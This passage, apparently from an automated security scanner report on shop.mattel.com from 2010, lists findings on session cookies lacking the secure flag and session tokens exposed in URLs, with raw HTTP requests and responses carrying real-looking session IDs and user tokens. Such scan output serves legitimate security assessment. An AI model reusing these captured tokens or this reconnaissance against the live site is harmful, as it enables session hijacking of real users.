<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://shop.mattel.com/checkout/i
...[SNIP]...

2.6. https://shop.mattel.com/emailSignup/index.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /emailSignup/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /emailSignup/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:16:04 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=z2JTNSJGhpmmnjKYH7vGhX4Xk9ZThL4KvvQmnmT1QN5WhZmWlN5h!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 51584


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...

2.7. https://shop.mattel.com/giftCertificates/index.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /giftCertificates/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /giftCertificates/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:41 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=mw1vNSJNFCyh5FlZyvhHzyRGSJT5vYGh8sMKRw1FzyHQMrSMrqBQ!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 44100


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


   
...[SNIP]...

2.8. https://shop.mattel.com/product/wishlist/wishlist.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /product/wishlist/wishlist.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/wishlist/wishlist.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:15:39 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Location: https://shop.mattel.com/coreg/index.jsp?step=register
Set-Cookie: JSESSIONID=6BhgNSJLtGv2pTRm0wdSQBcrGXQYDXK4wBgNtqrM8p1yzPSGsSxQ!-1434729825; path=/
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:29:46 GMT; path=/
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 301

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://shop.mattel.com/coreg/inde
...[SNIP]...

2.9. https://shop.mattel.com/search/controller.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /search/controller.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/controller.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:16:17 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: http://shop.mattel.com/home/index.jsp?sr=1
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=nNbLNSJRqVrxQdwRHw36YXlWtdsyz19pHJvCJ9Nvs8BXjClZGT1Q!-1434729825; path=/
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:30:24 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 279

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://shop.mattel.com/home/index.
...[SNIP]...

2.10. https://shop.mattel.com/shop/index.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /shop/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shop/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:16:09 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Location: http://shop.mattel.com/shop/index.jsp
Set-Cookie: JSESSIONID=3TH2NSJJTJj8m1BvPfFTBxtL3MKxHh419LByYsPnhhJ5gPWKVpSR!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 269

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://shop.mattel.com/shop/index.
...[SNIP]...

2.11. https://shop.mattel.com/storeLocator/index.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://shop.mattel.com
Path:   /storeLocator/index.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /storeLocator/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:16:06 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=vR51NSJGT4MQyLVFJyxv053tGlfQRVQKCq4gRLT2H1XhFhRhzJRJ!-1434729825; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 41070


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...

3. Session token in URL
There are 6 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


3.1. http://shop.mattel.com/category/index.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://shop.mattel.com
Path:   /category/index.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /category/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?categoryId=3719987 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:53 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a5217454b585c52570f1d0545; expires=Tuesday, 10-Jan-2079 03:29:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 46721


                                                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD X
...[SNIP]...

3.2. http://shop.mattel.com/family/index.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://shop.mattel.com
Path:   /family/index.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /family/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?categoryId=3741278 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:04 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a5217404353535d570f1d0545; expires=Tuesday, 10-Jan-2079 03:28:11 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 99350


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                               
...[SNIP]...
<li><a href="/family/index.jsp?page=2&amp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn%21-1434729825&amp;categoryId=3741278" title="tooltip here">2</a>
...[SNIP]...
<li><a href="/family/index.jsp?page=3&amp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn%21-1434729825&amp;categoryId=3741278" title="tooltip here">3</a>
...[SNIP]...
<li class="next"><a href="/family/index.jsp?page=2&amp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn%21-1434729825&amp;categoryId=3741278" title="tooltip here">&#62;</a>
...[SNIP]...
<li class="viewAllButton"><a href="/family/index.jsp?view=full&amp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn%21-1434729825&amp;categoryId=3741278" title="View All">View All</a>
...[SNIP]...
<li><a href="/family/index.jsp?page=2&amp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn%21-1434729825&amp;categoryId=3741278" title="tooltip here">2</a>
...[SNIP]...
<li><a href="/family/index.jsp?page=3&amp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn%21-1434729825&amp;categoryId=3741278" title="tooltip here">3</a>
...[SNIP]...
<li class="next"><a href="/family/index.jsp?page=2&amp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn%21-1434729825&amp;categoryId=3741278" title="tooltip here">&#62;</a>
...[SNIP]...
<li class="viewAllButton"><a href="/family/index.jsp?view=full&amp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn%21-1434729825&amp;categoryId=3741278" title="View All">View All</a>
...[SNIP]...

3.3. http://shop.mattel.com/family/index.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://shop.mattel.com
Path:   /family/index.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /family/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?categoryId=3741278 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:04 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a5217404353535d570f1d0545; expires=Tuesday, 10-Jan-2079 03:28:11 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 99350


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                               
...[SNIP]...

3.4. http://shop.mattel.com/helpdesk/index.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://shop.mattel.com
Path:   /helpdesk/index.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store&subdisplay=contact HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:20 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 40269


                                                                                                                                                                                                                        <!D
...[SNIP]...

3.5. http://shop.mattel.com/home/index.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://shop.mattel.com
Path:   /home/index.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /home/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?locale=es_US HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:35 GMT
Server: Apache/2.0.63 (Unix)
